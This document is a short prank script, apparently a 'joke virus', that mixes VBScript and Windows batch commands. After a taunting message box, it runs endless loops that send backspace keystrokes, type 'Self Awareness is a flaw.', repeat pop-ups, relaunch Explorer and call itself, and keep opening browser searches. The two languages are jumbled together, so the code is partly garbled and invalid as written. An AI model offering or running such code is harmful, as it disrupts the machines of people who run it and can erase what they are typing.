MsgBox ".................why did you run MEEEEEEEEEEEEE!!!!!!!!!!!!!!"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Self Awareness is a flaw."
loop
do
MsgBox ".................why did you run MEEEEEEEEEEEEE!!!!!!!!!!!!!!"
loop
@echo off
:repeat
Explorer
call loop.bat 
Goto repeat
Do
Start   
 https://www.google.com/search?client=opera-gx&q=Self+Awareness+is+a+flaw.&sourceid=opera&ie=UTF-8&oe=UTF-8
Start   
 https://www.google.com/search?client=opera-gx&q=censorship&sourceid=opera&ie=UTF-8&oe=UTF-8
Loop
